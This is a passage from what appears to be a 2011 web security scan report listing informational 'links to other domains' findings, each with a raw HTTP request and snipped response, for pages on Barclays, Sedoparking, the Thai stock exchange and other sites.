Confidence:   Certain
Host:   http://www.newsroom.barclays.com
Path:   /content/Detail.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /content/Detail.aspx?ReleaseID=1963&NewsAreaID=2 HTTP/1.1
Host: www.newsroom.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454061117:ss=1304454046661

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=s3icnwhgvna4gjofmlqfljdd; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:21:42 GMT
Content-Length: 68575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<!--meta tags-->

<link rel="schema.DC" href="http://purl.org/dc/elements/1.1/" /><link rel="schema.DCTERMS" href="http://purl.org/dc/terms/" /><meta name="keywords" content="Barclays, Barclays Group, Barclaycard, Barclays Capital, Barclays Global Investors, The Woolwich, news, press releases, consumer survey, investor relations, marketing, co
...[SNIP]...
<!--meta tags end-->
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2cpost%2cmail&amp;charset=utf-8&amp;style=default&amp;publisher=8413553c-d736-49fa-b695-f267b7a9b4af"></script>
...[SNIP]...
<div style="padding-bottom: 10px;">
<a target="blank" href="http://www.winzip.com" title="(opens a new window)">
Get WinZip</a>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcsnjkl3n1000004zx04k4zx9_9m5d/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.0"/></div>
...[SNIP]...

22.44. http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /landing/google/packettrapit/wireless.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
</style>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.validate/1.7/jquery.validate.min.js"></script>
...[SNIP]...
<!-- Clicky -->
<script src="http://static.getclicky.com/47665.js" type="text/javascript"></script>
...[SNIP]...
<p><img alt="Clicky" src="http://static.getclicky.com/47665-db5.gif" /></p>
...[SNIP]...

22.45. http://www.sedoparking.com/search/registrar.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sedoparking.com
Path:   /search/registrar.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com HTTP/1.1
Host: www.sedoparking.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.formlessnetworking.com/

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:42:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 03 May 2011 13:42:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tu=78431ea53addac790fabbb520eb3d47a; expires=Tue, 31-Dec-2019 23:00:00 GMT; path=/; domain=formlessnetworking.com; httponly
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
X-Cache: MISS from 835865
Connection: close
Content-Length: 20768

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><noscript>
   <meta http-equiv="refresh" content="0; URL=http://www.sedoparking.com/se
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" ></script>
...[SNIP]...
your name, address, email address, or telephone number. If you would like more information about this practice and to know your choices about not having this information used by these companies, click <a href="http://www.networkadvertising.org/managing/opt_out.asp" target="_blank">here</a>
...[SNIP]...
</script>
   <script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/apps/domainpark/show_afd_ads.js"></script>
...[SNIP]...
</script>

<iframe src='http://domdex.com/f?c=14&k=formlessnetworking' width=0 height=0 frameborder=0></iframe>
...[SNIP]...

22.46. http://www.set.or.th/set/oppdaybyperiod.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.set.or.th
Path:   /set/oppdaybyperiod.do

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /set/oppdaybyperiod.do?language=en&country=US HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/index.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:57:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=884D2D7AB4DAC6D78614FFFB7A7D8586; Path=/set
Content-Length: 118042


<html>
<head>
<link href="/set/styles/setstyle.css;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
</span> 8 Jun 2011) <img src="http://portal.settrade.com/ContentManager/images/icon_new.gif" width="34" height="14"></div>
...[SNIP]...
<div align="center"><a href="http://www.dcs-digital.com/setweb/index.php" target="_blank"><img src="/images/company/apple2.jpg" alt="Click to show Live Opportunity Day Webcast" width="230" border="0">
...[SNIP]...
<div align="center"><a href="http://www.youtube.com/settrade" target="_blank"><img src="/images/company/youtube1.jpg" width="78" height="78" border="0">
...[SNIP]...
<td>
<a href="http://www.kaohoon.com" target="_blank"><img src="/images/company/kaohun.jpg" width="60"border="0">
...[SNIP]...
<td>
<a href="http://www.moneychannel.co.th" target="_blank"><img src="/images/company/green logo.jpg" width="60"border="0">
...[SNIP]...
<td>
<a href="http://www.thunhoon.com/home/" target="_blank"><img src="/images/company/thunhoonlogo.gif" width="60"border="0">
...[SNIP]...
<td>
<a href="http://www.moneymartthai.com" target="_blank"><img src="/images/company/moneymart-nobg.gif" width="60"border="0">
...[SNIP]...
<td align="center">
<a href="http://www.hooninside.com" target="_blank"><img src="/images/company/hooninside.jpg" width="60"border="0">
...[SNIP]...
<td align="center">
<a href="http://www.manager.co.th" target="_blank"><img src="/images/company/astv_mngr.png" width="60"border="0">
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=384"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=406"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=371"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=376"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=374"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=412"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=391"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=422"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=397"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=396"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=421"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=441"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=424"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=445"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=430"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=386"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=442"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=429"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=420"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemand.php?onid=448"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=408"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=383"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=415"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=425"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=440"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=407"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=431"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=387"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=377"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=428"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=379"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=392"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=410"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=447"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=418"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=395"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=375"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=439"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=438"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=413"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=365"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=380"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=405"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=417"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=443"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=411"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=434"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=409"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=433"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=388"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=364"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=370"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=366"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://www.dcs-digital.com/setweb/ondemandnew.php?onid=446"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=385"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=414"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=382"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=416"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=399"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=435"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=432"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=393"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=436"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=372"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=381"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=401"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=437"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=400"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td align="center">

<a target="_blank" href="http://dcs-digital.com/setweb/ondemandnew.php?onid=378"><img height="15" width="16" border="0" src="/set/images/icon-Avi.gif;jsessionid=884D2D7AB4DAC6D78614FFFB7A7D8586" >
...[SNIP]...
<td valign="top" class="leftmenu"><a href="http://portal.settrade.com/C17_ResearchList.jsp" target="_blank" class="leftmenu">Research by MOU : KGI - mai - CGS (Search by source : mai by CGS / KGI) </a>
...[SNIP]...
<td valign="top"><a href="http://portal.settrade.com/C17_ResearchList.jsp" target="_blank"><img src="/images/company/research_mai.gif" alt="........... MOU : KGI - mai - CGS " width="140" height="90" border="0">
...[SNIP]...
<!-- AddThis Button BEGIN -->
&nbsp;&nbsp;<a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=250&amp;username=setwebadmin"><img src="http://s7.addthis.com/static/btn/v2/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=setwebadmin"></script>
...[SNIP]...
</script>
<script language="javascript1.1" src="http://hits.truehits.in.th/data/c0002486.js"></script>
<!-- END WEBSTAT CODE -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

22.47. http://www.zlmc.org/mindfulness-meditation.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zlmc.org
Path:   /mindfulness-meditation.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mindfulness-meditation.html?gclid=CLbmzNHyy6gCFUff4AodPQinqQ HTTP/1.1
Host: www.zlmc.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:01 GMT
Server: Apache/2.2.17
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7c4e00d12966c6a9d383111e612e1a5=930e9cbe73ffe1e034211a76fd8b0066; path=/
Last-Modified: Tue, 03 May 2011 13:43:01 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<td><a href="http://www.facebook.com/pages/Oak-Park-IL/Zen-Life-Meditation-Center-of-Chicago/225913692773?ref=ss&amp;v=wall" target="_blank"><img width="234" height="117" src="/images/stories/call_to_action/facebook.jpg" alt="facebook" />
...[SNIP]...
<p>Design by<a href="http://www.webtraxstudio.com">WebTrax Studio</a>from a template by <a href="http://www.joomlabamboo.com/" target="_blank">JoomlaBamboo</a>
...[SNIP]...

22.48. http://www2.itt-tech.edu/it/d/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /it/d/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /it/d/?code=12268064030|networking%20security HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
